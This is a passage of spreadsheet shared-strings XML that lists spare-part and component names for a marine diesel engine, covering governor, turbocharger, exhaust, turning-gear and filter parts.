  <si>
    <t>LINKAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GOVERNOR ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDEX CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GOVERNOR ARM - BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR F THROTTLE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lambda controller</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF BOOSTER SERVOMOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRAY-ASPINAL GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GOVERNOR CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAND. REPLACEMENT PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING BUSH, AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEVEL GEAR WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Carbon brush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOAD CURVE FOR PROPULSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR LUB. OF GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPM-A SYNCHRONIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DUAL FUEL CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMPULSE WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SYNCHRONIZING MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDE SHOE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retainer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Elastic stop nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Friction drive spring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Roll pin</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERSPEED STOP HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPING (RIGHT HAND)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END STOP SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MICRO SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB FOR BEVEL GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Software licence</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME-ECS, TEST SOFTWARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME-ECS, SOFTWARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SACS, Software</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SRING FOR FUEL LIMIT CYL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING F.GOVERNOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SHUTDOWN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for TSA box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF PRESS.CONVERTERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft, slide shoe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.BOX-EMERGENCY CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCK BALL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTACT ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR PNEUMATICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORSIONAL SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamping arm machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ERMETO UNION (CHANGE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLE SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder, stop piston valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cross piece</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSE F.START.PISTON VALV</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING (OUTER)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING        (INNER)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE 1/4"F.PRESS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE MEMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lever, pos. indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC Cut out valve - dummy</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange sleeve bearing for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil discharge pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power Take Off (100%), mount.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE FOR PI 23</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE CONDENSER-Y56</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPLIT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NECK NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAMPER CHARACTERISTIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for vibration damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VIBRATION DAMPER W. ATT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHELL,SCAV.AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING FIXTURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation cover, removable</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHELL FOR CONNECTING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SILENCER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BRANCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY STRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diffuser</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Heat insulation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation, charge air receiver</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blank off arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONDENSATE DISCHARGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELDING FOR DIFFUSER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.COMB.AIR BYPASS VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SAFETY HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELDING FOR AIR INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air pipe to intercooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shut-off valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of control air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intercooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air intake silencer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe piece, finish machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air pipe, arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering of compensator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air manifold</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inlet pipe for control valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Outlet pipe for control valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIFICATIONS-REG.57</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-EXH.VALVE-CLAMPED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NECK FLANGE-EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JUNK RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAR FOR GRID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND PLATE-AFTER T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHELL F.EXHAUST RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIVISION PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPACER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALVANIZED BANDIRON FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRENGTHENING RING, EXH.R</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connection parts, dry cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE (SHAPED)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE STUB FOR CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL BAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STIFFENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUBS FOR THERMOMETERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR STAYBOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION RETAIN. PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION PLATE COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUPTURE DISK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESTRICTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTAINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE F.COMPRES.WASH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation material, ass.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger dimensions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust pipe for cyl. 1+2+3</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silencer, incl. air filter felt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lock washer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulating sheet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Carrier</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dry cleaning of turbine side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foot, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Closing device, arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Closing device, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Closing cover, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Closing cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sheet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Component for MAN Turbocharger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATOR DUMMY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATOR EXTENDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Injection pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Magnetic shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover on coupling side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover on free end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover, intermediate part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rear plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamping claw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locating bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>V-profile clamp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Speed pick up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil injector</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nozzle ring with bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locating ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spare part kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas admission casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressor casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas outlet casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulating mat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulating, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering of exhaust pipe, mount.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering of exhaust pipe, ass.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ledge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control valve, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering before turbocharger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressor wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASIC GROUP FOR TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN/CLEANING OF TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT F. TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERING OF CH.AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTION OF CH. AIR CASING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END COVER FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMACH. CONNECTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN F. TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3-WAY COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER WASH OF COMPRESSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTT STRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUSPENSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST SILENCER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLOSING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBUST. AIR DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE - AFTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE AFTER TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SNAP COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE BEFORE TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FEED UNIT -UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FEED UNIT -LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEXIBLE COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL COLLECTING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB FOR FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR SOLUTION, FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling SKF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE FOR SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLYWHEEL, FINISH MACH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING DIVIDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SKETCH F.MARKING FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLYWHEEL (BLANK)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR RIM, DIVIDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTPUT SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WORM SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDE BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET-TURNING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNINGMOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.TURNING SAFETY DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Follower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneumatic turning device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Return spring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder roller</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grease fitting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spindle retainer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Motor assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spindle gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Delay timer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder dowel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>nut retainer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spindle bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>House for air turning motor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WORM GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressed air motor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inlet flange, assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSE FOR AIR MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR STARTER W. ATT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MUFFLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IN-LINE LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE REDUCTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ON-OFF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILTER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL FILTER DUPLEX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL FILTER ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plug key</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Circlip</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILTER HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-VENTING INSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE, LUB.OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB-CHAIN WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILTER PLATE INSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING FOR AIR CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE FOR COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTOM RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STIFFENER PLATE</t>
